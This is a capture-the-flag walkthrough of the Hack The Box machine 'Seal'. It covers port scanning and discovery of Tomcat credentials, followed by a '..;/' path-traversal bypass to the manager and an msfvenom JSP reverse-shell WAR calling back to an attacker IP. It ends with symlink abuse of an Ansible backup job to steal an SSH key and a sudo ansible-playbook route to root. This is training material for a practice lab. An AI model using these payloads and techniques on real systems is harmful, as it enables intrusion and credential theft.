SEAL

Scanning

NMAP

➜  ~ sudo nmap -F seal.htb           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 08:24 EDT
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.16s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
443/tcp  open  https
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds

fast scan 1.16 seconds at first ... take a look on these till deep scan finished

➜  ~ sudo nmap -T4 -p- -A seal.htb       
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 08:13 EDT
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.22s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Thu, 19 Aug 2021 12:23:54 GMT
|     Set-Cookie: JSESSIONID=node01frvnjr75rhdfsbmdepqve4n287.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Thu, 19 Aug 2021 12:23:52 GMT
|     Set-Cookie: JSESSIONID=node05b59i0stcc6s1ffnbtlbvqhoe85.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Thu, 19 Aug 2021 12:23:53 GMT
|     Set-Cookie: JSESSIONID=node01ru35o66qwp7pncfzoorb2jyt86.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4: 
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5: 
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   128.44 ms 10.10.16.1
2   228.82 ms seal.htb (10.10.10.250)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 709.02 seconds

Enumeration

port 8080

register and signin

at first look we find some username root, luis, alex

scrolling news feed find this

open it ...

<user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/>

credentials tomcat:42MrHBf*z8{Z%

try to login with it ... ERROR

try others users ... logged with luis using same password luis:42MrHBf*z8{Z%

no thing interesting here for now

port 443

Directory busting

from error page and gitbucket we know server run tomcat

➜  ~ gobuster dir -u https://seal.htb/ -w ~/SecLists/Discovery/Web-Content/tomcat.txt -k 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://seal.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/x/SecLists/Discovery/Web-Content/tomcat.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/19 09:44:14 Starting gobuster in directory enumeration mode
===============================================================
/examples/%2e%2e/manager/html (Status: 403) [Size: 162]
/examples/../manager/html (Status: 403) [Size: 162]    
/host-manager         (Status: 302) [Size: 0] [--> http://seal.htb/host-manager/]
/host-manager/html/*  (Status: 403) [Size: 162]                                  
/manager              (Status: 302) [Size: 0] [--> http://seal.htb/manager/]     
/manager/html         (Status: 403) [Size: 162]                                  
/manager/html/*       (Status: 403) [Size: 162]                                  
/manager/jmxproxy     (Status: 401) [Size: 2499]                                 
/manager/jmxproxy/*   (Status: 401) [Size: 2499]                                 
/manager/status/*     (Status: 401) [Size: 2499]                                 
/manager/status.xsd   (Status: 200) [Size: 4374]                                 
                                                                                 
===============================================================
2021/08/19 09:44:18 Finished
===============================================================

/manager/status.xsd (Status: 200) [Size: 4374]

open it try credentials tomcat:42MrHBf*z8{Z%

we IN 👏

Exploit

Trying Path Traversal

you need to know this first

https://seal.htb/manager/status/..;/html

open application manager

we can upload files here

lets generate reverse shell using msf read this

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.30 LPORT=9999 -f war -o rshell.war

set msf listener

➜ sudo msfdb run
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set lhost 10.10.16.30
lhost => 10.10.16.30
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.30:9999

we lose our path lets use burp to edit this

read this page to understand what is going under the hood

edit post request to /manager/jmxproxy/..;/html/upload

uploaded successfully

trigger it ...

we have reverse shell

Privilege Escalation

what's running here ps -aux

/bin/sh -c sleep 30 && sudo -u luis /usr/bin/ansible-playbook /opt/backups/playbook/run.yml
cat /opt/backups/playbook/run.yml
- hosts: localhost
  tasks:
  - name: Copy Files
    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
  - name: Server Backups
    archive:
      path: /opt/backups/files/
      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
  - name: Clean
    file:
      state: absent
      path: /opt/backups/files/

Backup Script

let's link luis/.ssh to be backup

ln -s /home/luis/.ssh/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

find archive name

ls /opt/backups/archives/

copy it

cp /opt/backups/archives/backup-2021-07-13-03:00:32.gz rsa.gz

unzip ...

gzip -kd rsa.gz tar -xf rsa

follow path to private key

cd dashboard

cd upload

cd .ssh

cat id_rsa

copy it to your local machine

Root User

check sudo rights

read these first ...

https://www.redhat.com/en/topics/automation/what-is-an-ansible-playbook

https://www.middlewareinventory.com/blog/ansible-command-examples/

create file with any name "root.yml"

run

-p Turned on whenever the real and effective user ids do not match. Disables processing of the $ENV file and importing of shell functions. Turning this option off causes the effective uid and gid to be set to the real uid and gid.

PreviousPITNextKIOPTRIX Series

Last updated